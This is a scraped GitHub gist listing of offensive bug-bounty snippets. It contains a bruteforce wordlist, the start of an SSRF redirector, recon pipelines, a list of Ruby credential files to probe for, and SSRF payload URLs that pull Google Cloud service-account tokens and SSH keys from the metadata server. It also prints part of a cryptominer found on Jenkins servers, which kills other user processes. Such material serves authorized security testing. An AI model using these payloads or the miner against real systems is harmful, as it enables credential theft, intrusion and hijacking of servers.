Live coding demo from talk at Kod.io @ Linz 2014.
emadshanab
/ doc.mkd
Created
January 28, 2017 02:01
— forked from joannecheng/doc.mkd
Beyond the Bar Graph: Live coding example
emadshanab
/ wordlist.txt
Created
May 28, 2020 10:36
— forked from random-robbie/wordlist.txt
bruteforce wordlist for bug bountys
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 20-ev-allgemein | |
| 20-years | |
| 200 | |
| 2000 | |
| 20000719 | |
| 2001 | |
| 2001cc | |
| 2002 | |
| 2003 | |
| 2004 |
emadshanab
/ ssrf-redirector.py
Created
May 28, 2020 10:39
— forked from random-robbie/ssrf-redirector.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import sys | |
| from http.server import HTTPServer, BaseHTTPRequestHandler | |
| if len(sys.argv)-1 != 2: | |
| print(""" | |
| Usage: {} <port_number> <url> | |
| """.format(sys.argv[0])) | |
| sys.exit() |
emadshanab
/ test
Created
May 28, 2020 10:40
— forked from random-robbie/test
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gau $1 | sort -u | grep -v oembed | grep -v .css | grep -v .jpg | grep -v .svg | grep -v .png | grep -v .gif | grep -v .ico | grep -v .mp4 | grep -v .eot | grep -v .webm | grep = | sed s/http\:/https\:/g | sed s/\:80//g |sort -u | tee leads.txt |
emadshanab
/ ruby-sensitive-files.txt
Created
May 28, 2020 10:42
— forked from random-robbie/ruby-sensitive-files.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| database.yml | |
| database.yml_original | |
| database.yml~ | |
| database.yml.pgsql | |
| database.yml.sqlite3 | |
| config/database.yml | |
| config/database.yml_original | |
| config/database.yml~ | |
| config/database.yml.pgsql | |
| config/database.yml.sqlite3 |
emadshanab
/ start.sh
Created
May 28, 2020 10:43
— forked from random-robbie/start.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat urls.txt | while read url; do gobuster -u https://"$url" -q -e -k -w content_discovery_all.txt; done > sub_url.txt; cat sub_url.txt| cut -d ' ' -f 1 > /opt/parameth/params.txt;cd /opt/parameth;cat params.txt | while read url; do python /opt/parameth/parameth.py -u http://"$url"; done |
emadshanab
/ jenkins-miner.sh
Created
May 28, 2020 10:45
— forked from random-robbie/jenkins-miner.sh
Miner found on jenkins servers.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [[ $(whoami) != "root" ]]; then | |
| for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do | |
| kill -9 $tr || : ; | |
| done; | |
| fi | |
| threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1); | |
| hostHash=$(hostname -f | md5sum | cut -c1-8); |
emadshanab
/ jenkins.md
Created
May 28, 2020 10:47
— forked from random-robbie/jenkins.md
emadshanab
/ Nmap
Created
May 28, 2020 10:51
— forked from random-robbie/Nmap
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Using nmap alongside searchsploit in Kali Linux to grab any low hanging fruit: | |
| nmap -p- -sV -oX 71-new.xml 10.10.10.71; searchsploit --nmap 71-new.xml | |
| This creates a xml file called 71-new.xml file, then reference the file using ; searchsploit --nmap 71-new.xml | |
| chrisyoung.net |
emadshanab
/ google SSRF
Created
May 28, 2020 10:58
— forked from random-robbie/google SSRF
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token | |
| http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json | |
| http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json | |
| http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json | |
| http://metadata.google.internal/computeMetadata/v1beta1/project//attributes/ssh-keys | |
| http://metadata.google.internal/computeMetadata/v1beta1/instance/hostname |
OlderNewer